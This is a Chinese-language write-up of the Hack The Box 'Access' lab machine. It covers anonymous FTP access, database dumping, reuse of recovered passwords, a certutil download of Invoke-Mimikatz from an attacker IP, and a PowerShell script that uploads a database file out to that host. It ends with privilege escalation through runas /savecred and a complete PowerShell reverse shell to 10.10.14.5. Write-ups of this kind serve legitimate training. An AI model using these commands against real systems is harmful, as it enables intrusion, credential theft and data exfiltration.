Hack The Box Access WriteUp

1.利用Anonymous匿名账户登录服务器,可以看到两个文件夹,一个是Backups,另一个是Engineer。在Backups文件夹下有backup.mdb的数据库文件,而Engineer中有Access Control.zip的压缩文件,将两个文件下载回本地。
Ftp服务器

2.在kali环境中,可以利用mdb-tools工具套件来读取.mdb文件,例如:列出所有的表mdb-export backup.mdb,这里利用python将数据库中所有信息导出

#!/usr/bin/python
# -*- coding: UTF-8 -*- 
import os

cmd = 'mdb-export backup.mdb '
table = 'acc_antiback acc_door acc_firstopen acc_firstopen_emp acc_holidays acc_interlock acc_levelset acc_levelset_door_group acc_linkageio acc_map acc_mapdoorpos acc_morecardempgroup acc_morecardgroup acc_timeseg acc_wiegandfmt ACGroup acholiday ACTimeZones action_log AlarmLog areaadmin att_attreport att_waitforprocessdata attcalclog attexception AuditedExc auth_group_permissions auth_message auth_permission auth_user auth_user_groups auth_user_user_permissions base_additiondata base_appoption base_basecode base_datatranslation base_operatortemplate base_personaloption base_strresource base_strtranslation base_systemoption CHECKEXACT CHECKINOUT dbbackuplog DEPARTMENTS deptadmin DeptUsedSchs devcmds devcmds_bak django_content_type django_session EmOpLog empitemdefine EXCNOTES FaceTemp iclock_dstime iclock_oplog iclock_testdata iclock_testdata_admin_area iclock_testdata_admin_dept LeaveClass LeaveClass1 Machines NUM_RUN NUM_RUN_DEIL operatecmds personnel_area personnel_cardtype personnel_empchange personnel_leavelog ReportItem SchClass SECURITYDETAILS ServerLog SHIFT TBKEY TBSMSALLOT TBSMSINFO TEMPLATE USER_OF_RUN USER_SPEDAY UserACMachines UserACPrivilege USERINFO userinfo_attarea UsersMachines UserUpdates worktable_groupmsg worktable_instantmsg worktable_msgtype worktable_usrmsg ZKAttendanceMonthStatistics acc_levelset_emp acc_morecardset ACUnlockComb AttParam auth_group AUTHDEVICE base_option dbapp_viewmodel FingerVein devlog HOLIDAYS personnel_issuecard SystemLog USER_TEMP_SCH UserUsedSClasses acc_monitor_log OfflinePermitGroups OfflinePermitUsers OfflinePermitDoors LossCard TmpPermitGroups TmpPermitUsers TmpPermitDoors ParamSet acc_reader acc_auxiliary STD_WiegandFmt CustomReport ReportField BioTemplate FaceTempEx FingerVeinEx TEMPLATEEx'

item_list = table.split(' ')

for item in item_list:
    print item
    c_cmd = cmd + item
    process = os.popen(c_cmd)
    output = process.read()
    process.close()
    table_file = open('backupdb/' + item,'w')
    table_file.write(output)
    table_file.close()
导出后的数据文件形式

3.在auth_user表中可以发现一组有用的用户名密码:engineer access4u@security
auth_user表

4.利用这个密码可以去解密刚下载的压缩包,压缩包里是一个.pst邮件格式文件,如果安装了outlook可以很容易的打开,如果没有可以在kali中安装evolution和evolution-plugins,readpst "Access Control.pst" 转换pst为mbox文件,mail -f "Access Control" 查看mbox文件。在邮件中保存有另一组登录帐号:security 4Cc3ssC0ntr0ller,这组账号可供telnet登录使用。
邮件内容

5.telnet登录后在security的桌面拿下user.txt
telnet登录

6.继续渗透会发现服务器禁止了.exe程序的执行,只能执行部分系统指令,powershell是唯一可能的突破口,但同样对运行权限做了限制,常用的Set-ExecutionPolicy Unrestricted限制绕过等指令都需要管理员权限。在当前环境中可以用以下命令进行上传,下载。下载功能是系统自带,上传需要用到ps1脚本,在kali中我搭建了ftp用于接收文件,虽然对本题并不能拿到线索,但也留个备份,以后可能用到。
windows自带下载命令:certutil -urlcache -split -f http://10.10.14.5/Invoke-Mimikatz.ps1
普通用户执行脚本:powershell -ExecutionPolicy ByPass -File new.ps1

#以下为Ftp上传脚本PS1#
$ftp="ftp://10.10.14.5"  
$user="root"  
$pass="123456"   
$webclient = New-Object System.Net.WebClient  
$webclient.Credentials = New-Object System.Net.NetworkCredential($user,$pass) 
$name="Access.mdb"
$uri = New-Object System.Uri($ftp+"/"+$name+"")  
$webclient.UploadFile($uri,"C:/ZKTeco/ZKAccess3.5/Access.mdb")

7.提权的关键在于Runas命令,其中runas带有 /savecred参数,能够以保存的用户凭据执行命令,所有在本地启动nc监听,一句话反弹runas /user:administrator /savecred "powershell -ExecutionPolicy ByPass -File C:\Users\Public\new.ps1",其中new.ps1是一段反弹powershell
runas参数
#以下是new.ps1反弹脚本#
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.5",6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

8.最后在Administrator的桌面目录中拿下root.txt
root.txt
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 211,639评论 6 492
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,277评论 3 385
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 157,221评论 0 348
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,474评论 1 283
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,570评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,816评论 1 290
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,957评论 3 408
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,718评论 0 266
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,176评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,511评论 2 327
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,646评论 1 340
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,322评论 4 330
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,934评论 3 313
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,755评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,987评论 1 266
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,358评论 2 360
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,514评论 2 348

推荐阅读更多精彩内容